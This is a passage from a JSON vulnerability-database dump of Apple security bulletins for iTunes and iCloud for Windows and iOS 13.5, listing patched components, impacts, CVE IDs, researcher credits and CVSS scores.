Lab\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n\n\n## Additional recognition\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-26T11:21:41", "title": "About the security content of iTunes 12.10.7 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-3878", "CVE-2020-9802", "CVE-2020-9800", "CVE-2020-9790", "CVE-2020-9850", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9789", "CVE-2020-9794"], "modified": "2020-05-26T11:21:41", "id": "APPLE:HT211178", "href": "https://support.apple.com/kb/HT211178", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:11", "description": "# About the security content of iCloud for Windows 7.19\n\nThis document describes the security content of iCloud for Windows 7.19.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iCloud for Windows 7.19\n\nReleased May 26, 2020\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**ImageIO**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**SQLite**\n\nAvailable for: Windows 7 and later\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n## Additional recognition\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 7.19", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9794", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-05-26T00:00:00", "id": "APPLE:AA9B80D4202B0773A6E30EECAE778C28", "href": "https://support.apple.com/kb/HT211181", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:11", "description": "# About the security content of iCloud for Windows 11.2\n\nThis document describes the security content of iCloud for Windows 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iCloud for Windows 11.2\n\nReleased May 26, 2020\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**SQLite**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n## Additional recognition\n\n**ImageIO**\n\nWe would like to acknowledge Lei Sun for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Aidan Dunlap of UT Austin for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 06, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878", "CVE-2020-9789", "CVE-2020-9790", "CVE-2020-9794", "CVE-2020-9800", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-05-26T00:00:00", "id": "APPLE:9CAF885CB18F659BDEB0CAC7F6570924", "href": "https://support.apple.com/kb/HT211179", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:24", "description": "# About the security content of iOS 13.5 and iPadOS 13.5\n\nThis document describes the security content of iOS 13.5 and iPadOS 13.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 13.5 and iPadOS 13.5\n\nReleased May 20, 2020\n\n**Accounts**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**AirDrop**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9826: Dor Hadad of Palo Alto Networks\n\n**AppleMobileFileIntegrity**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**Audio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An issue existed with the use of a PRNG with low entropy. This issue was addressed with improved state management.\n\nCVE-2020-6616: J\u00f6rn Tillmanns (@matedealer) and Jiska Classen (@naehrdine) of Secure Mobile Networking Lab\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9838: Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab\n\n**CoreText**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam\u2019s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com\n\n**FaceTime**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A user\u2019s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing\n\nDescription: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic.\n\nCVE-2020-9835: Olivier Levesque (@olilevesque)\n\n**File System**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to modify the file system\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9820: Thijs Alkemade of Computest\n\n**FontParser**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**IPSec**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9837: Thijs Alkemade of Computest\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**libxpc**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**Mail**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted mail message may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2020-9819: ZecOps.com\n\n**Mail**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9818: ZecOps.com\n\n**Messages**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-9823: Suryansh Mansharamani, student of Community Middle School, Plainsboro, New Jersey\n\n**Notifications**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A person with physical access to an iOS device may be able to view notification contents from the lockscreen\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2020-9848: Nima\n\n**rsync**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**Sandbox**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)\n\n**Security**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2020-9854: Ilias Morad (A2nkF)\n\nEntry added July 28, 2020\n\n**SQLite**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**USB Audio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A USB device may be able to cause a denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9792: Andy Davis of NCC Group\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9805: an anonymous researcher\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9802: Samuel Gro\u00df of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9850: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to a cross site scripting attack\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2020-9843: Ryan Pickren (ryanpickren.com)\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2020-9803: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9806: Wen Xu of SSLab at Georgia Tech\n\nCVE-2020-9807: Wen Xu of SSLab at Georgia Tech\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2020-9800: Brendan Draper (@6r3nd4n) working with Trend Micro Zero Day Initiative\n\n**WebRTC**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2019-20503: natashenka of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2020-9844: Ian Beer of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9830: Tielei Wang of Pangu Lab\n\nEntry added August 10, 2020\n\n## Additional recognition\n\n**Bluetooth**\n\nWe would like to acknowledge Maximilian von Tschirschnitz (@maxinfosec1) of Technical University Munich and Ludwig Peuckert of Technical University Munich for their assistance.\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**Device Analytics**\n\nWe would like to acknowledge Mohamed Ghannam (@_simo36) for their assistance.\n\n**ImageIO**\n\nWe would like to 